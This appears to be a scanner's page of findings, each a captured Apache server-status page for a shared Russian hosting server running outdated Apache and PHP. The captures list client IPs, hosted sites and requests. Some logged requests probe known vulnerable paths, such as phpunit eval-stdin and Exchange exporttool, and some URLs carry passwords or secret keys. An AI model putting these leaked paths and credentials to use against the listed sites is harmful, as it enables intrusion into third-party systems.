      0.207700.00.0064636.87
      127.0.0.1185.240.102.32:8080
      Found on 2024-05-23 10:59
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb423804e46b

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Monday, 13-May-2024 02:36:08 MSK
      Restart Time: Tuesday, 02-Apr-2024 09:40:58 MSK
      Parent Server Config. Generation: 1638
      Parent Server MPM Generation: 1637
      Server uptime:  40 days 16 hours 55 minutes 10 seconds
      Server load: 11.04 9.81 10.21
      Total accesses: 68946823 - Total Traffic: 6491.7 GB
      CPU Usage: u44.79 s9.58 cu0 cs0 - .00155% CPU load
      19.6 requests/sec - 1.9 MB/second - 98.7 kB/request
      9 requests currently being processed, 8 idle workers
      _WW_WWWW_W..__._.W.W..._....._..................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-1637151700/124/3037364_
      0.28062760.06.35295340.13
      185.240.102.28my-fc.ru:8080GET /backend/soccer/fixtures/get_fixtures.php HTTP/1.0
      
      1-1637196930/56/2994239W
      0.12000.02.66291223.00
      213.180.203.230scooter-ani.ru:8080GET /product/variator-peredniy-v-sbore-152qmi-157qmj-atv150-1/ 
      
      2-1637147210/174/2950547W
      0.422800.018.89284842.00
      185.240.102.28compra-s.ru:8080GET /wp-admin/admin-ajax.php?action=wordfence_doScan&isFork=1&s
      
      3-1637208130/78/2906329_
      0.2002200.08.74282040.16
      94.102.51.144thebestmebel.ru:8080POST /wp-json/litespeed/v1/cdn_status HTTP/1.0
      
      4-1637179670/116/2847463W
      0.29000.06.98279418.09
      206.189.19.19trustdefend.org:8080GET /server-status HTTP/1.0
      
      5-1637209730/81/2826792W
      0.20000.02.01273924.88
      66.249.66.32xf-forum.ru:8080GET /resources/categories/bb-code-xf2-2-x.22/ HTTP/1.0
      
      6-1637216100/14/2767684W
      0.041900.00.57269316.72
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      7-1637209740/29/2721513W
      0.063800.00.79262241.13
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      8-1637218070/31/2663927_
      0.09010540.00.56257520.44
      94.25.174.8persant.ru:8080GET /aksessuary/?page=145 HTTP/1.0
      
      9-1637223070/11/2589897W
      0.02000.00.31252548.22
      80.82.76.214vuruguay.ru:8080GET /404-1 HTTP/1.0
      
      10-1637-0/0/2544574.
      0.441900.00.00244721.11
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      11-1637-0/0/2476354.
      0.234400.00.00242630.41
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      12-1637170790/139/2394207_
      0.30040.08.10232867.31
      185.240.102.28thebestmebel.ru:8080POST /wp-cron.php?doing_wp_cron=1715556968.37664008140563964843
      
      13-1637173020/61/2288735_
      0.120230.03.77219250.38
      188.170.84.242uggilook.ru:8080GET /index.php?route=extension/module/barbara_singleclick/succe
      
      14-1637-0/0/2216862.
      0.0611500.00.00213706.97
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      15-1637173740/168/2116066_
      0.630210.0158.64207828.34
      3.145.201.472xvosta.ru:8080GET /8in1-natural-oatmeal-shampoo-shampun-dlya-sobak-uspokaivay
      
      16-1637-0/0/2014408.
      0.0810100.00.00196988.58
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      17-1637175760/71/1891869W
      0.164100.04.29184013.86
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      18-1637-0/0/1767743.
      0.0611100.00.00169344.83
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      19-1637178780/76/1642514W
      0.18300.04.98159147.44
      213.180.203.247mebozon.ru:8080GET /divany/pryamye-divany/divan-modulnyj-monreal-5-milton HTTP
      
      20-1637-0/0/1505943.
      0.0212100.00.00147611.86
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      21-1637-0/0/1382989.
      0.068300.00.00134710.72
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      22-1637-0/0/1271433.
      0.0410200.00.00122805.51
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      23-1637181460/101/1121165_
      0.2202850.03.58107646.15
      178.20.235.164syromonoed.org:8080GET /zhrat-do-otvala-i-xudet.html HTTP/1.0
      
      24-1637-0/0/978341.
      0.622000.00.0096483.04
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      25-1637-0/0/892283.
      0.155800.00.0084498.27
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      26-1637-0/0/808899.
      0.525500.00.0077318.48
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      27-1637-0/0/745849.
      0.1431000.00.0071500.11
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      28-1637-0/0/697514.
      0.3710000.00.0068714.93
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      29-1637113090/289/647591_
      0.71030.055.5662326.41
      213.180.203.90xcanshop.ru:8080GET /wp-content/uploads/feed-yml-0.yml HTTP/1.0
      
      30-1637-0/0/583718.
      0.0635200.00.0056704.05
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-1637-0/0/532157.
      0.1725300.00.0052221.34
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      32-1637-0/0/481150.
      0.0037900.00.0045743.66
      127.0.0
      Found on 2024-05-12 23:35
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb42895a4fa4

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Wednesday, 08-May-2024 23:51:08 MSK
      Restart Time: Tuesday, 02-Apr-2024 09:40:58 MSK
      Parent Server Config. Generation: 1525
      Parent Server MPM Generation: 1524
      Server uptime:  36 days 14 hours 10 minutes 10 seconds
      Server load: 10.08 10.16 10.40
      Total accesses: 61560933 - Total Traffic: 5798.7 GB
      CPU Usage: u27.5 s4.86 cu0 cs0 - .00102% CPU load
      19.5 requests/sec - 1.9 MB/second - 98.8 kB/request
      11 requests currently being processed, 6 idle workers
      _WWWWWWW_W___.W...W..W............_.............................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-1524135460/146/2731612_
      0.4201170.08.78265125.44
      103.98.214.249leacond.ru:8080GET /publichtml/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.
      
      1-1524167820/33/2692181W
      0.07000.01.20261781.69
      217.113.194.13bluepumpkin.ru:8080GET /brand/blue-pumpkin/?query_type_brand=or&filter_brand=a-boy
      
      2-1524138200/132/2655306W
      0.30000.07.26256818.56
      176.59.42.157corle-pivo-pizza.site:8080GET /index.php?route=checkout/success HTTP/1.0
      
      3-1524122410/129/2614947W
      0.282100.07.95251612.94
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      4-1524106970/210/2558405W
      0.48700.030.39250824.08
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      5-1524140290/51/2543455W
      0.12000.02.07246533.34
      95.108.213.172na-rostelekome.ru:8080GET /----------------------------------------------------------
      
      6-1524163860/47/2489068W
      0.09000.03.34242346.80
      80.82.76.214vuruguay.ru:8080GET /404-1 HTTP/1.0
      
      7-1524170600/19/2448566W
      0.03000.00.52234953.02
      206.189.19.19trustdefend.org:8080GET /server-status HTTP/1.0
      
      8-1524122730/175/2397770_
      0.39000.010.90231716.17
      178.176.77.139magic-school.net:8080GET /uploads/monthly_2019_02/favicon.ico.e50dee6b4c0813248e8e47
      
      9-152469000/231/2330349W
      0.586400.031.01227598.86
      185.240.102.28over-shop.ru:8080GET /index.php?route=extension/module/syncms/OrderAdd&cron= HTT
      
      10-152474790/230/2289446_
      0.5305040.012.29219800.80
      80.82.76.214vuruguay.ru:8080GET /404-1 HTTP/1.0
      
      11-1524173720/13/2228723_
      0.0201600.00.74218284.63
      91.215.90.152mintim.ru:8080GET /webasyst/?action=count&background_process=1&idle=true&_=17
      
      12-1524151370/38/2153678_
      0.0803180.01.68210067.36
      66.249.68.67ventgrad.tomsk.ru:8080GET /index.php/katalog?error=404&virtuemart_manufacturer_id=40&
      
      13-1524-0/0/2059181.
      0.321600.00.00196662.95
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      14-1524152400/38/1995431W
      0.081400.02.76192327.80
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      15-1524-0/0/1907273.
      0.493800.00.00187322.53
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      16-1524-0/0/1810393.
      0.074200.00.00176657.84
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      17-1524-0/0/1706090.
      0.19000.00.00165474.47
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      18-1524155690/78/1591973W
      0.16000.04.68153284.67
      123.186.79.186letovam.ru:8080GET /news HTTP/1.0
      
      19-1524-0/0/1478303.
      0.033600.00.00142758.39
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      20-1524-0/0/1349056.
      0.232400.00.00132269.55
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      21-1524109310/172/1244519W
      0.43000.062.60121286.86
      18.223.106.100clearspb.ru:8080GET /sredstvo-dlya-obshchei-chistki-polov-rm-751-10-l HTTP/1.0
      
      22-1524-0/0/1138517.
      0.8313000.00.00108891.83
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      23-1524-0/0/1008003.
      0.564300.00.0097260.60
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      24-1524-0/0/878807.
      0.078500.00.0087037.55
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      25-1524-0/0/799373.
      0.0110800.00.0075904.62
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      26-1524-0/0/731177.
      0.0611300.00.0070651.80
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      27-1524-0/0/670823.
      0.1911700.00.0064400.58
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      28-1524-0/0/625259.
      0.5013400.00.0061884.59
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      29-1524-0/0/583200.
      0.0912000.00.0056492.59
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      30-1524-0/0/524271.
      0.3612100.00.0051112.90
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-1524-0/0/474451.
      0.0611100.00.0046289.08
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      32-1524-0/0/428075.
      0.281300.00.0040263.27
      127.0.0.1
      Found on 2024-05-08 20:50
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb4210899f3a

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Wednesday, 01-May-2024 01:47:02 MSK
      Restart Time: Tuesday, 02-Apr-2024 09:40:58 MSK
      Parent Server Config. Generation: 1264
      Parent Server MPM Generation: 1263
      Server uptime:  28 days 16 hours 6 minutes 4 seconds
      Server load: 6.26 8.04 8.93
      Total accesses: 47610182 - Total Traffic: 4504.6 GB
      CPU Usage: u33.24 s8.83 cu0 cs0 - .0017% CPU load
      19.2 requests/sec - 1.9 MB/second - 99.2 kB/request
      13 requests currently being processed, 5 idle workers
      _WWW__WWWW...W..W..._...W........W_......W..W...................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-126378110/27/2135380_
      0.04000.01.49209250.80
      172.105.16.40trustdefend.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      1-126383210/2/2100322W
      0.00000.00.01204635.02
      213.180.203.24tehnodom.org:8080GET / HTTP/1.0
      
      2-126371500/38/2072100W
      0.07100.02.22202716.22
      95.108.213.103bluepumpkin.ru:8080GET /maintenance/ HTTP/1.0
      
      3-126371520/36/2039501W
      0.08300.01.66196766.64
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      4-126378430/21/1995392_
      0.030120.00.47196346.70
      5.253.61.250jadestudio.ru:8080GET /engine/kodik/grab.php?secret_key=f7yt69frgy7t HTTP/1.0
      
      5-126335110/94/1986880_
      0.30025410.06.34193986.45
      151.248.120.42intelspro.ru:8080POST /gw/ HTTP/1.0
      
      6-126349260/87/1940588W
      0.19000.012.01188958.52
      213.180.203.135mebozon.ru:8080GET /ecomeb/divan-loretto-plyush-beze HTTP/1.0
      
      7-126383830/0/1911447W
      0.00000.00.00182109.31
      185.240.102.28my-fc.ru:8080GET /backend/soccer/fixtures/get_fixtures.php HTTP/1.0
      
      8-126335160/94/1872109W
      0.21000.05.36181838.72
      185.240.102.28in-academia.ru:8080GET /moo/admin/cron.php?password=opensesame HTTP/1.0
      
      9-126383850/0/1816999W
      0.01000.00.00177289.73
      213.180.203.27montevideo.ru:8080GET / HTTP/1.0
      
      10-1263-0/0/1783885.
      0.007300.00.00172047.70
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      11-1263-0/0/1738631.
      0.096200.00.00171123.86
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      12-1263-0/0/1673379.
      0.133100.00.00164794.00
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      13-126335700/62/1604455W
      0.142300.02.25153374.98
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      14-1263-0/0/1552989.
      0.112500.00.00150710.23
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      15-1263-0/0/1489393.
      0.007000.00.00145959.86
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      16-126352730/81/1402764W
      0.17000.04.94136731.92
      5.255.231.119mintim.ru:8080GET /?yclid=7710547526903176844 HTTP/1.0
      
      17-1263-0/0/1316455.
      0.006800.00.00128815.30
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      18-1263-0/0/1235675.
      0.086300.00.00119178.28
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      19-1263-0/0/1143504.
      0.026000.00.00111560.65
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      20-126352940/50/1036248_
      0.0903740.03.32102493.02
      94.25.170.182magic-school.net:8080GET /topic/4253-troyka-posohov-3-posohov-mladshiy-arkan-kart-ta
      
      21-1263-0/0/964842.
      0.028100.00.0094015.34
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      22-1263-0/0/886004.
      0.046400.00.0085205.73
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      23-1263-0/0/784551.
      0.018300.00.0074837.75
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      24-126352980/37/678967W
      0.06000.01.6867649.63
      172.105.16.40trustdefend.org:8080GET /server-status HTTP/1.0
      
      25-1263-0/0/618018.
      0.027100.00.0059095.20
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      26-1263-0/0/561209.
      0.036500.00.0054676.30
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      27-1263-0/0/514712.
      0.017900.00.0049203.86
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      28-1263-0/0/473137.
      0.015800.00.0046994.01
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      29-1263-0/0/450114.
      0.122100.00.0044430.24
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      30-1263-0/0/399487.
      0.036100.00.0039176.57
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-1263-0/0/359553.
      0.437200.00.0035580.90
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      32-1263-0/0/325341.
      0.025500.00.0030362.72
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      33-126353470/30/284515W
      0.06200.04.3027187.48
      89.113.149.71xn----7s
      Found on 2024-04-30 22:46
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb42b2b7c218

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
      Server Built: Jun  9 2023 19:20:27
      
      Current Time: Friday, 19-Apr-2024 02:44:16 MSK
      Restart Time: Tuesday, 02-Apr-2024 09:40:58 MSK
      Parent Server Config. Generation: 821
      Parent Server MPM Generation: 820
      Server uptime:  16 days 17 hours 3 minutes 18 seconds
      Server load: 8.41 9.12 8.59
      Total accesses: 26388009 - Total Traffic: 2331.8 GB
      CPU Usage: u43.36 s13.32 cu0 cs0 - .00393% CPU load
      18.3 requests/sec - 1.7 MB/second - 92.7 kB/request
      8 requests currently being processed, 8 idle workers
      W____WWWWW_W.W___...............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      <SrvPIDAccMCPU
      SSReqConnChildSlotClientVHostRequest
      
      0-82064440/33/1201734W
      0.07000.01.97111870.59
      3.128.198.217shooting-ua.com:8080GET /forum/topic320-60.html?sid=1c79978b4e00fcfa74574e7f52cb4c2
      
      1-82064810/40/1185937_
      0.080640.01.81108856.52
      142.93.0.66poezd-allegro-train.ru:8080GET /v2/_catalog HTTP/1.0
      
      2-82049790/80/1167627_
      0.1509830.03.00108344.65
      213.180.203.62mebozon.ru:8080GET /divany/pryamye-divany/divan-loretto-up-plyush-plum?page=72
      
      3-82069910/16/1144152_
      0.02000.00.32101465.60
      206.81.24.74tritiumstore.ru:8080GET / HTTP/1.0
      
      4-82012160/181/1119056_
      0.380770.07.41103105.42
      95.108.213.248zworkstation.ru:8080GET /shop/solutions/foroffice/hp_notebooks/229L1EA/ HTTP/1.0
      
      5-82052880/48/1119057W
      0.092300.01.99103529.46
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      6-82058490/55/1092531W
      0.121000.01.8599310.98
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      7-82058780/62/1073801W
      0.13000.03.0196805.07
      165.227.173.41trustdefend.org:8080GET /server-status HTTP/1.0
      
      8-82064820/16/1055008W
      0.041100.00.5596243.48
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      9-820319620/252/1024589W
      0.86700.0203.2894019.71
      185.240.102.28ml-dom.ru:8080POST /wp-admin/admin-ajax.php?action=wp_web-archive-external-pi
      
      10-82033800/90/1000155_
      0.18060.03.8891319.65
      195.128.246.32ds-hikvision.ru:8080GET /favicon.ico HTTP/1.0
      
      11-82058790/51/975622W
      0.11300.03.1790068.98
      185.240.102.28ldk-sokol.ru:8080POST /?mailpoet_router&endpoint=cron_daemon&action=run&data=eyJ
      
      12-820-0/0/941931.
      0.051600.00.0086826.28
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      13-82059260/52/904699W
      0.101100.02.2782130.45
      5.157.55.13sleep70.ru:8080GET /vse-dlya-sna/postelnoe-bele/prostyn-trikotazhnaya-na-rezin
      
      14-820280190/298/872163_
      0.69000.024.9277003.70
      3.142.135.86magic-school.net:8080GET /robots.txt HTTP/1.0
      
      15-82028980/232/838072_
      0.5008030.026.0176162.79
      95.24.156.80klubnt.nl:8080GET /link.php?link=29462 HTTP/1.0
      
      16-820268400/457/792360_
      1.00070.019.3472653.34
      195.128.246.32ds-hikvision.ru:8080GET /favicon.ico HTTP/1.0
      
      17-820-0/0/737131.
      0.003300.00.0067875.71
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      18-820-0/0/684921.
      0.013100.00.0061427.93
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      19-820-0/0/643267.
      0.0523600.00.0059236.82
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      20-820-0/0/578235.
      0.4218800.00.0054508.34
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      21-820-0/0/541357.
      0.0027500.00.0049056.75
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      22-820-0/0/488960.
      0.3312800.00.0043301.98
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      23-820-0/0/431783.
      0.0424700.00.0038659.81
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      24-820-0/0/374680.
      0.1419900.00.0035163.83
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      25-820-0/0/344534.
      0.0228500.00.0029660.39
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      26-820-0/0/305140.
      0.0225500.00.0027930.23
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      27-820-0/0/289783.
      0.5523800.00.0025645.68
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      28-820-0/0/266194.
      0.8925400.00.0023897.04
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      29-820-0/0/248389.
      0.0227200.00.0023063.60
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      30-820-0/0/219197.
      0.0325000.00.0019541.91
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      31-820-0/0/193320.
      0.622800.00.0017565.46
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      32-820-0/0/175861.
      0.0128000.00.0014472.15
      127.0.0.1185.240.102.32:8080OPTIONS * HTTP/1.0
      
      33-820-0/0/155437.
      0.0924000.00.00
      Found on 2024-04-18 23:44
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e6a8eb42e6a8eb42ed7bf64b

      Apache Status
      
      Apache Server Status for www.trustdefend.org (via 127.0.0.1)
      
      Server Version: Apache/2.4.6 (CloudLinux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
      Server MPM: prefork
